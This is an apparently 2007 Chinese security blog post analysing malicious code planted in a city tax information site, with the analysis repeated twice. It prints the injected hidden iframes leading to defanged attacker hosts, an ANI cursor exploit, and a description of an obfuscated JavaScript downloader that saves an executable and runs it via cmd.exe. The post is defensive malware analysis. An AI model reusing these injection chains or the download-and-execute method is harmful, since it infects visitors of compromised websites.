某市国税信息检索系统被植入传播Worm.Win32.Delf.bs的代码
2007-04-26 23:43
471 查看
endurer 原创
2007-04-26 第1版
植入代码为:
/---
<IFRAME src="hxxp://www.hao12**3**hao1**23.cn/ok/index.htm" frameBorder=0 width=0 height=0></IFRAME>
---/
hxxp://www.hao12**3**hao1**23.cn/ok/index.htm 标题为:爱恋千雪,包含代码:
/---
<iframe src="hxxp://www.qq5***13.cn/bbs/177***1.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.qq5***13.cn/bbs/177***1.htm 包含代码:
/---
<iframe src="hxxp://www.5***55*y.net/" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.5***55*y.net/ 首页包含代码:
/---
<iframe src=hxxp://www.97***72**5.com/97***725**16.htm?008 width=0 height=0></iframe>
---/
hxxp://www.97***72**5.com/97***725**16.htm?008 包含代码:
/---
<BODY style='CURSOR: url(hxxp://www.97***72**5.com/muxiao2.jpg)'></BODY>
</HTML>
<script src=hxxp://www.97***72**5.com/0614.js></script>
---/
hxxp://www.97***72**5.com/muxiao2.jpg(Kaspersky 报为:Exploit.Win32.IMG-ANI.k),下载 97725.exe。
文件说明符 : D:/test/97725.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-26 17:41:54
修改时间 : 2007-4-26 17:41:54
访问时间 : 2007-4-26 17:43:0
大小 : 16626 字节 16.242 KB
MD5 : a76acec51b3acc5d4da8dbaeb5257e80
UpackByDwing
Kasersky 报为 Worm.Win32.Delf.bs
hxxp://www.97***72**5.com/0614.js 的内容为 JavaScript脚本,功能为用自定义函数解密代码并通过 eval()来运行。
解密后的代码再次用eval()解密来运行。
再次解密后的JavaScript代码的功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 97725.exe,保存到%windir%,文件名由自定义函数:
/---
function gn(n){var number = Math.random()*n;
return ‘~tmp’+‘.tmp’;}
---/
生成,即 ~tmp.tmp。然后通过 Shell.Application 对象 Q 的方法执行命令:%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。
2007-04-26 第1版
植入代码为:
/---
<IFRAME src="hxxp://www.hao12**3**hao1**23.cn/ok/index.htm" frameBorder=0 width=0 height=0></IFRAME>
---/
hxxp://www.hao12**3**hao1**23.cn/ok/index.htm 标题为:爱恋千雪,包含代码:
/---
<iframe src="hxxp://www.qq5***13.cn/bbs/177***1.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.qq5***13.cn/bbs/177***1.htm 包含代码:
/---
<iframe src="hxxp://www.5***55*y.net/" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.5***55*y.net/ 首页包含代码:
/---
<iframe src=hxxp://www.97***72**5.com/97***725**16.htm?008 width=0 height=0></iframe>
---/
hxxp://www.97***72**5.com/97***725**16.htm?008 包含代码:
/---
<BODY style='CURSOR: url(hxxp://www.97***72**5.com/muxiao2.jpg)'></BODY>
</HTML>
<script src=hxxp://www.97***72**5.com/0614.js></script>
---/
hxxp://www.97***72**5.com/muxiao2.jpg(Kaspersky 报为:Exploit.Win32.IMG-ANI.k),下载 97725.exe。
文件说明符 : D:/test/97725.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-26 17:41:54
修改时间 : 2007-4-26 17:41:54
访问时间 : 2007-4-26 17:43:0
大小 : 16626 字节 16.242 KB
MD5 : a76acec51b3acc5d4da8dbaeb5257e80
UpackByDwing
Kasersky 报为 Worm.Win32.Delf.bs
hxxp://www.97***72**5.com/0614.js 的内容为 JavaScript脚本,功能为用自定义函数解密代码并通过 eval()来运行。
解密后的代码再次用eval()解密来运行。
再次解密后的JavaScript代码的功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 97725.exe,保存到%windir%,文件名由自定义函数:
/---
function gn(n){var number = Math.random()*n;
return ‘~tmp’+‘.tmp’;}
---/
生成,即 ~tmp.tmp。然后通过 Shell.Application 对象 Q 的方法执行命令:%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。
相关文章推荐
- 某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码
- 某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
- 某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
- 某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码
- 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
- 某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
- 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
- 某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
- 系统代码生成工具源码
- android recovery 主系统代码分析
- html中显示当前系统时间代码
- 查找SAP系统用户出口列表的程序代码(--SMOD)
- 模拟系统nbtstat 的代码实现
- 新闻发布系统中的代码记录2
- C#.NET通用权限管理系统组件中用少数几行代码实现记录页面状态
- JpetStore5.0代码分析及系统架构初探
- 切换系统默认语言后,Eclipse代码自动补全快捷键失效。
- 基于MapX的导弹攻击沙盘演示系统代码
- 电子表代码,用C语言写的,可以显示系统时间和年月日,而且可以改变时间!
- ytu 2614 A代码完善--系统日期